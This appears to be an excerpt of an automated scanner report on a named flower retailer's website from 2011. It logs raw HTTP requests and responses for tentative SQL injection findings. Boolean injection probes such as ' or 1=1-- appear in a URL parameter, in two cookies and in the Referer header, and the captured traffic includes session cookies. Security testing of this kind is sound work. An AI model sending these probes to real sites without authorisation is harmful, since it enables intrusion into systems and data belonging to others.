User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zqemLI5tFS3_cCVIEMj3gm6:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
               
...[SNIP]...

Request 2

POST /deliverycalendarnew.do?month=512903751%20or%201%3d2--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
                   
                       
                       
                           <div class="calDay inactiveday" id="
...[SNIP]...

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The CMAVID cookie appears to be vulnerable to SQL injection attacks. The payloads 56663729'%20or%201%3d1--%20 and 56663729'%20or%201%3d2--%20 were each submitted in the CMAVID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d1--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787






















<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .bluetabs li a.tabnormal8 {padding-right:15px !important;} .bluetabs {/* Edit NAV BG Img & color */background: url(http://media1.1800flowers.com/800f_asset
...[SNIP]...

Request 2

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d2--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 2

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000OxINk2rPNAnwU2DMQGwt1bU:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787






















<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .
...[SNIP]...

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The brandCode cookie appears to be vulnerable to SQL injection attacks. The payloads 11283013'%20or%201%3d1--%20 and 11283013'%20or%201%3d2--%20 were each submitted in the brandCode cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d1--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:40 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Wj3sXdlqqkt2mok1wAhSlIN:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

















   
   
   







<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-
...[SNIP]...

Request 2

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d2--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:44 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

















   
   
   







<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.
...[SNIP]...

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Ln0FjPqsWC1vFgUWBlg4otv:-1; Path=/
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826























<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

